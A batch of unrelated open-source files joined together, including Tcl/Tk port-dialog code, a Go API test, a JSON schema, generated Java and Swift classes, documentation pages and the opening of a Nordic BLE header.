\t\t -command tksu::Redo\n button $w.clear -text Default -underline 0 -width $bwid \\\n \t\t -command \"tksu::ParamClear $instance\"\n\n# Pack up all objects.\n\n pack $w.title -side top -fill x\n\n pack $w.pipe.label $w.pipe.button -side left\n pack $w.enter -padx 10 -side right -in $w.pipe\n pack $w.pipe.portB $w.pipe.port $w.pipe.portlabel -side right\n pack $w.pipe.moduleB -side right\n pack $w.pipe.module -fill x -pady 2\n pack $w.pipe -side top -fill x\n\n pack $w.file.label $w.file.button -side left\n pack $w.undo -padx 10 -side right -in $w.file\n pack $w.file.entry -fill x -pady 2\n pack $w.file -side top -fill x\n\n pack $w.temp.label $w.temp.button -side left\n pack $w.redo -padx 10 -side right -in $w.temp\n pack $w.fileDialog -side right -in $w.temp\n pack $w.temp -side top -fill x\n\n pack $w.default.label -side left -padx 2\n pack $w.clear -padx 10 -side right -in $w.default\n pack $w.default.value -side left -padx 2 -anchor w -fill x -expand 1\n pack $w.default -side top -fill x\n\n pack $w.data.label $w.data.value -side left -padx 2\n pack $w.data.color -padx 10 -side right\n pack $w.data -side top -fill x\n\n pack $w.desc.label -side left -padx 2 -anchor nw\n pack $w.desc.value -side left -padx 2 -anchor nw -fill x -expand 1\n pack $w.desc -pady 4 -side top -anchor n -fill x\n\n pack $w -side bottom -fill x\n\n# Accelerator bindings:\n\n set f .param$instance\n bind $f \"$w.pipe.button invoke\"\n bind $f \"$w.file.button invoke\"\n bind $f \"$w.temp.button invoke\"\n bind $f \"$w.fileDialog invoke\"\n\n# These bindings apply to both param and port dialogs:\n\n bind $f \"tksu::ParamEnter $instance\"\n bind $f tksu::Undo\n bind $f tksu::Redo\n bind $f \"tksu::ParamClear $instance\"\n return\n}\n\n#-------------------------------------------------------------------------------\n# LoadPortDialog -- load settings for given port into parameter dialog.\n#\n# Args: instance\tInstance number of parameter list window.\n#\t nlist\tPort name structure, a list in the format\n#\t\t\t{ genericName dataType rw default description }.\n#\t\t\tSee LoadSpecs for more details. nlist is usually\n#\t\t\tstored in the Ports array.\n#\t vlist\tPort value structure, a list in the format\n#\t\t\t{ port-or-param genericName name value undo redo }.\n#\t\t\tSee ParamList for more details. vlist is usually\n#\t\t\tstored in the Values array.\n# Returns: null\n#\n# The port value may be in one of the following formats:\n#\n# pipe\t\tAn unconnected pipe.\n# {pipe id ...}\tThe port has one or more pipes connected to it.\n#\t\t\tThe id's are indexes into the Links array.\n# {pipe module port}\tAfter the user has made changes in the port dialog,\n#\t\t\tand before the value has been verified and saved to\n#\t\t\tValues, this form holds the request to\n#\t\t\tcreate a link to the given module and port name.\n# file\t\tAn unconnected file port.\n# {file filename}\tA file port, read or write to filename.\n# temp\t\tA temp port, read DevZero or write DevNull.\n#\n#-------------------------------------------------------------------------------\n\nproc tksu::LoadPortDialog {instance nlist vlist} {\n variable CurrentModule\n variable CurrentParam\n variable CurrentValue\n variable LongDefault\n variable LongDesc\n variable PortAction\n variable Instances\n variable Color\n\n set portName [lindex $nlist 0]\n set portType [lindex $nlist 1]\n set portDir [lindex $nlist 2]\n set portDefault [lindex $nlist 3]\n set portDesc [lrange $nlist 4 end]\n\n# If entry widgets are linked to an EnumList window, unlink them.\n\n UnlinkEntries $instance\n set CurrentParam($instance) $nlist\n set CurrentValue($instance) $vlist\n\n set w .param$instance.port\n\n# Set initial focus to pipe module button or file entry.\n\n set module $CurrentModule($instance)\n set modbase [ModBase $module]\n set f [focus]\n\n if {$f != \".param$instance.list\" && $f != \".param$instance.scroll\"} {\n\tif [info exists Instances($module)] {\n\t set focusee $w.pipe.moduleB\n\t} else {\n\t set focusee $w.file.entry\n\t}\n \tfocus $focusee\n\tif {[focus] != $focusee} update\n }\n $w.file.entry configure -state normal\n $w.file.entry delete 0 end\n\n# Set label titles according to dir: `r' for read-only, `w' for write-only,\n# or `rw' for file read-write.\n\n switch -- $portDir {\n\n\t\"r\" {\n\n# Input port:\n\n\t $w.title configure -text \"Input port `$portName'\"\n\t $w.pipe.button configure -text \"Pipe from module:\" -state normal\n\t $w.file.button configure -text \"Read from file:\"\n\t $w.temp.button configure -text \"Read zeros\"\n\t}\n\t\"w\" {\n\n# Output port:\n\n\t $w.title configure -text \"Output port `$portName'\"\n\t $w.pipe.button configure -text \"Pipe to module:\" -state normal\n\t $w.file.button configure -text \"Write to file:\"\n\t $w.temp.button configure -text \"Discard output\"\n\t}\n\t\"rw\" {\n\n# Read-write port:\n\n\t $w.title configure -text \"Random access port `$portName'\"\n\t $w.pipe.button configure -text \"Pipe to module:\" -state disabled\n\t $w.file.button configure -text \"Read/write file:\"\n\t $w.temp.button configure -text \"Read/write temporary file\"\n\t}\n }\n\n# Load port entry widgets and set radiobuttons.\n\n set value [lindex $vlist 3]\n LoadPortValue $instance $value\n\n# File type description.\n\n set desc [EnumDesc enum-file $portType]\n if {[llength $desc] <= 0} {\n\tset desc \"unknown\"\n }\n $w.data.value configure -text [format \"%s (type `%s')\" $desc $portType]\n $w.data.color configure -background $Color($portType) -text $portType \\\n \t\t\t -activebackground $Color($portType)\n\n# Default description.\n\n if [info exists LongDefault($modbase,$portName)] {\n\tset desc $LongDefault($modbase,$portName)\n } else {\n\tset desc [DefaultValue long $portDefault]\n }\n set wraplength [expr [winfo width $w.default.value] - 40]\n if {$wraplength < 100} {\n \tset wraplength 12c\n }\n $w.default.value configure -text $desc -wraplength $wraplength\n\n# Port description.\n\n if [info exists LongDesc($modbase,$portName)] {\n\tset desc $LongDesc($modbase,$portName)\n } else {\n\tset desc $portDesc\n }\n set wraplength [expr [winfo width $w.desc.value] - 40]\n if {$wraplength < 100} {\n \tset wraplength 12c\n }\n $w.desc.value configure -text $desc -wraplength $wraplength\n return\n}\n\n#-------------------------------------------------------------------------------\n# GetPortValue -- retrieve correctly formatted value from port dialog entries.\n#\n# Args: instance\tInstance number of parameter list window.\n# Returns: value\tA port value in one of the following forms:\n#\t\t\t(a) pipe ?module port? (but NOT pipe ?id ...?)\n#\t\t\t(b) file ?filename?\n#\t\t\t(c) temp\n#-------------------------------------------------------------------------------\n\nproc tksu::GetPortValue instance {\n variable PortAction\n\n set w .param$instance.port\n set value $PortAction($instance)\n\n switch -- $value {\n \t\n\tpipe {\n\t set module [string trim [$w.pipe.module get]]\n\t set port [string trim [$w.pipe.port get]]\n\n\t if {$module != \"\" && $module != \"NONE\" && $port != \"\"} {\n\t\tset value \"pipe $module $port\"\n\t }\n\t}\n\tfile {\n\t set filename [string trim [$w.file.entry get]]\n\t set value \"file $filename\"\n\t}\n\ttemp {\n\t}\n }\n return $value\n}\n\n#-------------------------------------------------------------------------------\n# FormatPortValue -- return formatted port value.\n#\n# Args: rw\t\tI/O direction of port: `r', `w', or `rw'.\n#\t value\tPort value (see LoadPortDialog for format).\n# Returns: string\tA formatted string suitable for the parameter list.\n#-------------------------------------------------------------------------------\n\nproc tksu::FormatPortValue {rw value} {\n variable DevNull\n variable DevZero\n\n set action [lindex $value 0]\n set target [lindex $value 1]\n\n switch -- $action {\n \tpipe {\n\t if {$target == \"\" || $rw == \"rw\"} {\n\t \treturn \n\t }\n\n# Pipe value is a list of link ids:\n\n\t switch -- $rw {\n\t \tr {set direction w}\n\t\tw {set direction r}\n\t }\n\t if {[GetModPort $target $direction] != \"\"} {\n\t \tforeach id [lrange $value 1 end] {\n\t\t set modport [join [GetModPort $id $direction] :]\n\t\t if {$id != $target} {append str ,}\n\t\t append str $modport\n\t\t}\n\n# Pipe value is {module port}:\n\n\t } else {\n\t\tset str [join [lrange $value 1 2] :]\n\t }\n\t return $str\n\t}\n\n\tfile {\n\t return $target\n\t}\n\n\ttemp {\n\t switch -- $rw {\n\t \tr {return $DevZero}\n\t\tw {return $DevNull}\n\t\trw {return \"temp file\"}\n\t }\n\t}\n }\n return\n}\n\n#-------------------------------------------------------------------------------\n# LoadPortValue -- load given port value to dialog entries.\n#\n# Args: instance\tInstance number of parameter list window.\n#\t value\tA port value (see LoadPortDialog for details).\n# Returns: null\n#\n# Dialog widgets are filled and radiobuttons are set.\n#-------------------------------------------------------------------------------\n\nproc tksu::LoadPortValue {instance value} {\n variable CurrentParam\n variable CurrentModule\n variable PortAction\n\n set w .param$instance.port\n\n# If the focus is in one of the following widgets, change it to the new\n# active entry.\n\n set changeFocus 0\n foreach f \"$w.pipe.button $w.pipe.moduleB $w.pipe.portB $w.file.button \\\n \t $w.file.entry $w.temp.button $w.fileDialog\" {\n\tif {[focus] == $f} {\n\t set changeFocus 1\n\t}\n }\n set action [lindex $value 0]\n set target [lindex $value 1]\n set rw [lindex $CurrentParam($instance) 2]\n\n# If null, set action from default.\n\n if {$action == \"\"} {\n\tset action [lindex [NewValue port $CurrentParam($instance)] 3]\n\tset target \"\"\n }\n set PortAction($instance) $action\n\n $w.pipe.module configure -state normal\n $w.pipe.module delete 0 end\n $w.pipe.module configure -state disabled\n $w.pipe.moduleB configure -state disabled\n\n $w.pipe.port configure -state normal\n $w.pipe.port delete 0 end\n $w.pipe.port configure -state disabled\n $w.pipe.portB configure -state disabled\n\n $w.file.entry configure -state normal\n $w.file.entry delete 0 end\n $w.file.entry configure -state disabled\n $w.fileDialog configure -state disabled\n\n switch -- $action {\n pipe {\n\n# For preset parameter dialogs, disable the module and port entries.\n\n\t set module $CurrentModule($instance)\n\t if {$module == [ModBase $module]} {\n\t\tif $changeFocus {focus $w.pipe.button}\n\t\treturn\n\t }\n\n\t switch -- $rw {\n\t \tr {set direction w}\n\t\tw {set direction r}\n\t\trw {return}\n\t }\n\n# If a link is present, show the module and port of the link.\n\n\t set modport [GetModPort $target $direction]\n\t if {$modport != \"\"} {\n\t \tset module [lindex $modport 0]\n\t\tset port [lindex $modport 1]\n\t } else {\n\t \tset module [lindex $value 1]\n\t\tset port [lindex $value 2]\n\t }\n\t $w.pipe.moduleB configure -state normal\n\t $w.pipe.module configure -state normal\n\t $w.pipe.module insert 0 $module\n\t $w.pipe.module configure -state disabled\n\n\t $w.pipe.portB configure -state normal\n\t $w.pipe.port configure -state normal\n\t $w.pipe.port insert 0 $port\n\t $w.pipe.port configure -state disabled\n\n\t if $changeFocus {focus $w.pipe.moduleB}\n\t}\n\n\tfile {\n\t $w.fileDialog configure -state normal\n\t $w.file.entry configure -state normal\n\t $w.file.entry insert 0 $target\n\t if $changeFocus {focus $w.file.entry}\n\t}\n\n\ttemp {\n\t if $changeFocus {focus $w.temp.button}\n\t}\n }\n return\n}\n\n#-------------------------------------------------------------------------------\n# PipeModules -- select module from a modal list of modules.\n#\n# Args: instance\tInstance number for this dialog.\n# Returns: null\n#\n# ModalList is called to display current module instances in a listbox below\n# the module entry. When a selection is made and the listbox is withdrawn,\n# the module entry holds the new selection (but remains disabled).\n#\n# After selection, look for an existing link to the selected module. If\n# found, set the port entry to the connecting port. Otherwise set the\n# port entry blank.\n#-------------------------------------------------------------------------------\n\nproc tksu::PipeModules instance {\n variable CurrentParam\n variable CurrentValue\n variable Instances\n\n# Provide blank line at top of list for deleting a link.\n\n lappend modules {}\n eval lappend modules [lsort [array names Instances]]\n set w .param$instance.port.pipe\n\n ModalList $w.module $modules\n\n# If a link is present to the shown module, show the link's port.\n\n set rw [lindex $CurrentParam($instance) 2]\n switch -- $rw {\n \tr {set direction w}\n\tw {set direction r}\n }\n set module [string trim [$w.module get]]\n set port \"\"\n set value [lindex $CurrentValue($instance) 3]\n\n if {[lindex $value 0] == \"pipe\"} {\n\tforeach id [lrange $value 1 end] {\n\t set modport [GetModPort $id $direction]\n\n\t # Looking for a module name match ...\n\t if {$modport == \"\" || [lindex $modport 0] != $module} continue\n\n\t # Got one ...\n\t set port [lindex $modport 1]\n\t break\n\t}\n }\n\n# Load the port name.\n\n $w.port configure -state normal\n $w.port delete 0 end\n $w.port insert 0 $port\n $w.port configure -state disabled\n return\n}\n\n#-------------------------------------------------------------------------------\n# PipePorts -- select port from a modal list of ports.\n#\n# Args: instance\tInstance number for this dialog.\n# Returns: null\n#\n# ModalList is called to display current ports in a listbox below the port\n# entry. When a selection is made and the listbox is withdrawn, the port\n# entry holds the new selection (but remains disabled).\n#\n# The ports listed are those that belong to the module currently shown in\n# the module entry widget, and have the opposite I/O sense of the current\n# port in the dialog window. If no ports apply, the port list contains a\n# single blank entry.\n#-------------------------------------------------------------------------------\n\nproc tksu::PipePorts instance {\n variable CurrentParam\n variable Ports\n\n lappend ports {}\n set rw1 [lindex $CurrentParam($instance) 2]\n set w .param$instance.port.pipe\n set module [string trim [$w.module get]]\n\n if {$module != \"\"} {\n\tset modbase [ModBase $module]\n\tif [info exists Ports($modbase)] {\n\t foreach nlist $Ports($modbase) {\n\t\tset rw2 [lindex $nlist 2]\n\t\tif {$rw2 == \"rw\" || $rw2 == $rw1} continue\n\t\tlappend ports [lindex $nlist 0]\n\t }\n\t}\n }\n ModalList $w.port $ports\n return\n}\n\n#-------------------------------------------------------------------------------\n# PortToggle -- handler for port dialog radio buttons.\n#\n# Args: instance\tInstance number of parameter list window.\n# Returns: null\n#-------------------------------------------------------------------------------\n\nproc tksu::PortToggle instance {\n variable PortAction\n variable CurrentModule\n\n set w .param$instance.port\n set action $PortAction($instance)\n set module $CurrentModule($instance)\n\n set changeFocus 0\n foreach f \"$w.pipe.button $w.pipe.moduleB $w.pipe.portB $w.file.button \\\n \t $w.file.entry $w.temp.button $w.fileDialog\" {\n\tif {[focus] == $f} {set changeFocus 1}\n }\n $w.pipe.moduleB configure -state disabled\n $w.pipe.portB configure -state disabled\n $w.file.entry configure -state disabled\n $w.fileDialog configure -state disabled\n\n switch -- $action {\n pipe {\n\t if {$module == [ModBase $module]} {\n\t\tif $changeFocus {focus $w.pipe.button}\n\t } else {\n\t\t$w.pipe.moduleB configure -state normal\n\t\t$w.pipe.portB configure -state normal\n\t\tif $changeFocus {focus $w.pipe.moduleB}\n\t }\n\t}\n\tfile {\n\t $w.fileDialog configure -state normal\n\t $w.file.entry configure -state normal\n\t if $changeFocus {focus $w.file.entry}\n\t}\n\ttemp {\n\t if $changeFocus {focus $w.temp.button}\n\t}\n }\n return\n}\n\n#-------------------------------------------------------------------------------\n# PortFile -- raise dialog for selecting input or output file.\n#\n# Args: instance\tInstance number of parameter list window.\n# Returns: null\n#\n# If non-null filename is returned from dialog, it is stored in the file\n# entry widget.\n#-------------------------------------------------------------------------------\n\nproc tksu::PortFile instance {\n variable CurrentParam\n variable DataDir\n\n set w .param$instance.port.file.entry\n set rw [lindex $CurrentParam($instance) 2]\n\n if {$rw == \"r\"} {\n \tset filename [tk_getOpenFile -initialdir $DataDir]\n } else {\n \tset filename [tk_getSaveFile -initialdir $DataDir]\n }\n\n if {$filename != \"\"} {\n\tPushDialog $instance\n \t$w delete 0 end\n\t$w insert 0 $filename\n\tset DataDir [file dirname $filename]\n\tParamEnter $instance\n }\n return\n}\n"} {"text": "// Copyright 2014 tsuru authors. All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\npackage api\n\nimport (\n\t\"encoding/json\"\n\t\"github.com/tsuru/tsuru/iaas\"\n\t\"launchpad.net/gocheck\"\n\t\"net/http\"\n\t\"net/http/httptest\"\n)\n\ntype TestIaaS struct{}\n\nfunc (TestIaaS) DeleteMachine(m *iaas.Machine) error {\n\tm.Status = \"destroyed\"\n\treturn nil\n}\n\nfunc (TestIaaS) CreateMachine(params map[string]string) (*iaas.Machine, error) {\n\tm := iaas.Machine{\n\t\tId: params[\"id\"],\n\t\tStatus: \"running\",\n\t\tAddress: params[\"id\"] + \".somewhere.com\",\n\t}\n\treturn &m, nil\n}\n\nfunc (s *S) TestMachinesList(c *gocheck.C) {\n\tiaas.RegisterIaasProvider(\"test-iaas\", TestIaaS{})\n\t_, err := iaas.CreateMachineForIaaS(\"test-iaas\", map[string]string{\"id\": \"myid1\"})\n\tdefer (&iaas.Machine{Id: \"myid1\"}).Destroy()\n\tc.Assert(err, gocheck.IsNil)\n\t_, err = iaas.CreateMachineForIaaS(\"test-iaas\", map[string]string{\"id\": \"myid2\"})\n\tdefer (&iaas.Machine{Id: \"myid2\"}).Destroy()\n\tc.Assert(err, gocheck.IsNil)\n\trecorder := httptest.NewRecorder()\n\trequest, err := http.NewRequest(\"GET\", \"/iaas/machines\", nil)\n\tc.Assert(err, gocheck.IsNil)\n\trequest.Header.Set(\"Authorization\", \"bearer \"+s.admintoken.GetValue())\n\tm := RunServer(true)\n\tm.ServeHTTP(recorder, request)\n\tc.Assert(recorder.Code, gocheck.Equals, http.StatusOK)\n\tvar machines []iaas.Machine\n\terr = json.NewDecoder(recorder.Body).Decode(&machines)\n\tc.Assert(err, gocheck.IsNil)\n\tc.Assert(machines[0].Id, gocheck.Equals, \"myid1\")\n\tc.Assert(machines[0].Address, gocheck.Equals, \"myid1.somewhere.com\")\n\tc.Assert(machines[0].CreationParams, gocheck.DeepEquals, map[string]string{\n\t\t\"id\": \"myid1\",\n\t})\n\tc.Assert(machines[1].Id, gocheck.Equals, \"myid2\")\n\tc.Assert(machines[1].Address, gocheck.Equals, \"myid2.somewhere.com\")\n\tc.Assert(machines[1].CreationParams, gocheck.DeepEquals, map[string]string{\n\t\t\"id\": \"myid2\",\n\t})\n}\n\nfunc (s *S) TestMachinesDestroy(c *gocheck.C) {\n\tiaas.RegisterIaasProvider(\"test-iaas\", TestIaaS{})\n\t_, err := iaas.CreateMachineForIaaS(\"test-iaas\", map[string]string{\"id\": \"myid1\"})\n\tc.Assert(err, gocheck.IsNil)\n\trecorder := httptest.NewRecorder()\n\trequest, err := http.NewRequest(\"DELETE\", \"/iaas/machines/myid1\", nil)\n\tc.Assert(err, gocheck.IsNil)\n\trequest.Header.Set(\"Authorization\", \"bearer \"+s.admintoken.GetValue())\n\tm := RunServer(true)\n\tm.ServeHTTP(recorder, request)\n\tc.Assert(recorder.Code, gocheck.Equals, http.StatusOK)\n}\n\nfunc (s *S) TestMachinesDestroyError(c *gocheck.C) {\n\trecorder := httptest.NewRecorder()\n\trequest, err := http.NewRequest(\"DELETE\", \"/iaas/machines/myid1\", nil)\n\tc.Assert(err, gocheck.IsNil)\n\trequest.Header.Set(\"Authorization\", \"bearer \"+s.admintoken.GetValue())\n\tm := RunServer(true)\n\tm.ServeHTTP(recorder, request)\n\tc.Assert(recorder.Code, gocheck.Equals, http.StatusNotFound)\n\tc.Assert(recorder.Body.String(), gocheck.Equals, \"machine not found\\n\")\n}\n"} {"text": "{\n \"jsonSchemaSemanticVersion\": \"1.0.0\",\n \"imports\": [\n {\n \"corpusPath\": \"cdm:/foundations.1.1.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Common.1.0.cdm.json\",\n \"moniker\": \"base_Common\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/DataEntityView.1.0.cdm.json\",\n \"moniker\": \"base_DataEntityView\"\n },\n {\n \"corpusPath\": \"BudgetPlanScenario.1.0.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Tables/System/SystemAdministration/Group/LanguageTable.1.0.cdm.json\"\n }\n ],\n \"definitions\": [\n {\n \"entityName\": \"BudgetPlanScenarioTranslation\",\n \"extendsEntity\": \"base_Common/Common\",\n \"exhibitsTraits\": [\n {\n \"traitReference\": \"is.CDM.entityVersion\",\n \"arguments\": [\n {\n \"name\": \"versionNumber\",\n \"value\": \"1.0\"\n }\n ]\n }\n ],\n \"hasAttributes\": [\n {\n \"name\": \"BudgetPlanScenario\",\n \"dataType\": \"BudgetPlanScenarioRecId\",\n \"description\": \"\"\n },\n {\n \"name\": \"Description\",\n \"dataType\": \"BudgetPlanScenarioDescription\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"LanguageId\",\n \"dataType\": \"LanguageIdAll\",\n \"description\": \"\"\n },\n {\n \"name\": \"Name\",\n \"dataType\": \"BudgetPlanScenarioName\",\n \"description\": \"\"\n },\n {\n \"entity\": {\n \"entityReference\": \"BudgetPlanScenario\"\n },\n \"name\": \"Relationship_BudgetPlanScenarioRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n },\n {\n \"entity\": {\n \"entityReference\": \"LanguageTable\"\n },\n \"name\": \"Relationship_LanguageTableRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n }\n ],\n \"displayName\": \"Budget plan scenario translations\"\n },\n {\n \"dataTypeName\": \"BudgetPlanScenarioRecId\",\n \"extendsDataType\": \"bigInteger\"\n },\n {\n \"dataTypeName\": \"BudgetPlanScenarioDescription\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"LanguageIdAll\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"BudgetPlanScenarioName\",\n \"extendsDataType\": \"string\"\n }\n ]\n}"} {"text": "/**\n * Copyright (c) Microsoft Corporation. All rights reserved.\n * Licensed under the MIT License. See License.txt in the project root for\n * license information.\n *\n * Code generated by Microsoft (R) AutoRest Code Generator.\n */\n\npackage com.microsoft.azure.cognitiveservices.search.customsearch.models;\n\nimport com.fasterxml.jackson.annotation.JsonProperty;\n\n/**\n * Defines the error that occurred.\n */\npublic class Error {\n /**\n * The error code that identifies the category of error. Possible values\n * include: 'None', 'ServerError', 'InvalidRequest', 'RateLimitExceeded',\n * 'InvalidAuthorization', 'InsufficientAuthorization'.\n */\n @JsonProperty(value = \"code\", required = true)\n private ErrorCode code;\n\n /**\n * The error code that further helps to identify the error. Possible values\n * include: 'UnexpectedError', 'ResourceError', 'NotImplemented',\n * 'ParameterMissing', 'ParameterInvalidValue', 'HttpNotAllowed',\n * 'Blocked', 'AuthorizationMissing', 'AuthorizationRedundancy',\n * 'AuthorizationDisabled', 'AuthorizationExpired'.\n */\n @JsonProperty(value = \"subCode\", access = JsonProperty.Access.WRITE_ONLY)\n private ErrorSubCode subCode;\n\n /**\n * A description of the error.\n */\n @JsonProperty(value = \"message\", required = true)\n private String message;\n\n /**\n * A description that provides additional information about the error.\n */\n @JsonProperty(value = \"moreDetails\", access = JsonProperty.Access.WRITE_ONLY)\n private String moreDetails;\n\n /**\n * The parameter in the request that caused the error.\n */\n @JsonProperty(value = \"parameter\", access = JsonProperty.Access.WRITE_ONLY)\n private String parameter;\n\n /**\n * The parameter's value in the request that was not valid.\n */\n @JsonProperty(value = \"value\", access = JsonProperty.Access.WRITE_ONLY)\n private String value;\n\n /**\n * Get the code value.\n *\n * @return the code value\n */\n public ErrorCode code() {\n return this.code;\n }\n\n /**\n * Set the code value.\n *\n * @param code the code value to set\n * @return the Error object itself.\n */\n public Error withCode(ErrorCode code) {\n this.code = code;\n return this;\n }\n\n /**\n * Get the subCode value.\n *\n * @return the subCode value\n */\n public ErrorSubCode subCode() {\n return this.subCode;\n }\n\n /**\n * Get the message value.\n *\n * @return the message value\n */\n public String message() {\n return this.message;\n }\n\n /**\n * Set the message value.\n *\n * @param message the message value to set\n * @return the Error object itself.\n */\n public Error withMessage(String message) {\n this.message = message;\n return this;\n }\n\n /**\n * Get the moreDetails value.\n *\n * @return the moreDetails value\n */\n public String moreDetails() {\n return this.moreDetails;\n }\n\n /**\n * Get the parameter value.\n *\n * @return the parameter value\n */\n public String parameter() {\n return this.parameter;\n }\n\n /**\n * Get the value value.\n *\n * @return the value value\n */\n public String value() {\n return this.value;\n }\n\n}\n"} {"text": "\n\nCodeMirror: Turtle mode\n\n\n\n\n\n\n\n\n\n
\n

Turtle mode

\n
\n \n\n

MIME types defined: text/turtle.

\n\n
\n"} {"text": "#import \n#import \n#import \"AppDelegate.h\"\n\nint main(int argc, char* argv[]) {\n @autoreleasepool {\n return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));\n }\n}\n"} {"text": ".. _pages/widget/datefield#datefield:\n\nDateField\n*********\nA DateField widget can be used for date input. The input can be done in to kinds. The first kind is to chose a date from a date chose, which is a part of the DateField. The second kind is to write the date direct in the input field.\n.. _pages/widget/datefield#preview_image:\n\nPreview Image\n-------------\n\n|DateField|\n\n.. |DateField| image:: /pages/widget/datefield.png\n\n.. _pages/widget/datefield#features:\n\nFeatures\n--------\n* Pointer and keyboard support.\n* Custom date format.\n\n.. _pages/widget/datefield#description:\n\nDescription\n-----------\nA DateField has a ``qx.util.format.DateFormat`` which is used to format the date to a string. The formatted string is show in the input field. The input can be edit directly in the input filed or selecting a date with the data chooser. The date chooser can be pop up by tapping the calendar icon.\n\n.. _pages/widget/datefield#demos:\n\nDemos\n-----\nHere are some links that demonstrate the usage of the widget:\n\n* `DateField Demo `_\n* `Form demo `_\n\n.. _pages/widget/datefield#api:\n\nAPI\n---\n| Here is a link to the API of the Widget:\n| `qx.ui.form.DateField `_\n\n"} {"text": "//\n// ChartDefaultFillFormatter.swift\n// Charts\n//\n// Created by Daniel Cohen Gindi on 04/02/2016.\n//\n// Copyright 2015 Daniel Cohen Gindi & Philipp Jahoda\n// A port of MPAndroidChart for iOS\n// Licensed under Apache License 2.0\n//\n// https://github.com/danielgindi/ios-charts\n//\n\nimport Foundation\nimport CoreGraphics\n\n#if !os(OSX)\n import UIKit\n#endif\n\n/// Default formatter that calculates the position of the filled line.\npublic class ChartDefaultFillFormatter: NSObject, ChartFillFormatter\n{\n public override init()\n {\n }\n \n public func getFillLinePosition(dataSet dataSet: ILineChartDataSet, dataProvider: LineChartDataProvider) -> CGFloat\n {\n var fillMin = CGFloat(0.0)\n \n if (dataSet.yMax > 0.0 && dataSet.yMin < 0.0)\n {\n fillMin = 0.0\n }\n else\n {\n if let data = dataProvider.data\n {\n var max: Double, min: Double\n \n if (data.yMax > 0.0)\n {\n max = 0.0\n }\n else\n {\n max = dataProvider.chartYMax\n }\n \n if (data.yMin < 0.0)\n {\n min = 0.0\n }\n else\n {\n min = dataProvider.chartYMin\n }\n \n fillMin = CGFloat(dataSet.yMin >= 0.0 ? min : max)\n }\n }\n \n return fillMin\n }\n}\n"} {"text": "\n\n\n\n\n\norg.apache.sysds.runtime.controlprogram.paramserv Class Hierarchy (SystemDS 2.0.0-SNAPSHOT API)\n\n\n\n\n\n\n\n\n
\n\n\n\n
\n\n
\n\n\n
\n\n
\n

Hierarchy For Package org.apache.sysds.runtime.controlprogram.paramserv

\nPackage Hierarchies:\n\n
\n
\n

Class Hierarchy

\n
    \n
  • java.lang.Object\n
      \n
    • org.apache.sysds.runtime.controlprogram.paramserv.ParamServer\n\n
    • \n
    • org.apache.sysds.runtime.controlprogram.paramserv.ParamservUtils
    • \n
    • org.apache.sysds.runtime.controlprogram.paramserv.PSWorker (implements java.io.Serializable)\n
        \n
      • org.apache.sysds.runtime.controlprogram.paramserv.LocalPSWorker (implements java.util.concurrent.Callable<V>)\n
          \n
        • org.apache.sysds.runtime.controlprogram.paramserv.SparkPSWorker (implements org.apache.spark.api.java.function.VoidFunction<T>)
        • \n
        \n
      • \n
      \n
    • \n
    • org.apache.sysds.runtime.controlprogram.paramserv.SparkPSBody
    • \n
    \n
  • \n
\n
\n\n\n
\n\n\n\n
\n\n
\n\n\n
\n\n

Copyright © 2020 The Apache Software Foundation. All rights reserved.

\n\n\n"} {"text": "/*\r\n * Copyright (c) Nordic Semiconductor ASA\r\n * All rights reserved.\r\n *\r\n * Redistribution and use in source and binary forms, with or without modification,\r\n * are permitted provided that the following conditions are met:\r\n *\r\n * 1. Redistributions of source code must retain the above copyright notice, this\r\n * list of conditions and the following disclaimer.\r\n *\r\n * 2. Redistributions in binary form must reproduce the above copyright notice, this\r\n * list of conditions and the following disclaimer in the documentation and/or\r\n * other materials provided with the distribution.\r\n *\r\n * 3. Neither the name of Nordic Semiconductor ASA nor the names of other\r\n * contributors to this software may be used to endorse or promote products\r\n * derived from this software without specific prior written permission.\r\n *\r\n * 4. This software must only be used in a processor manufactured by Nordic\r\n * Semiconductor ASA, or in a processor manufactured by a third party that\r\n * is used in combination with a processor manufactured by Nordic Semiconductor.\r\n *\r\n *\r\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\r\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\r\n * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\r\n * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\r\n * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\r\n * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\r\n * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\r\n * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\r\n * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n *\r\n */\r\n\r\n/**\r\n @addtogroup BLE_GATTS Generic Attribute Profile (GATT) Server\r\n @{\r\n @brief Definitions and prototypes for the GATTS interface.\r\n */\r\n\r\n#ifndef BLE_GATTS_H__\r\n#define BLE_GATTS_H__\r\n\r\n#include \"ble_types.h\"\r\n#include \"ble_ranges.h\"\r\n#include \"ble_l2cap.h\"\r\n#include \"ble_gap.h\"\r\n#include \"ble_gatt.h\"\r\n#include \"nrf_svc.h\"\r\n\r\n/** @addtogroup BLE_GATTS_ENUMERATIONS Enumerations\r\n * @{ */\r\n\r\n/**\r\n * @brief GATTS API SVC numbers.\r\n */\r\nenum BLE_GATTS_SVCS\r\n{\r\n 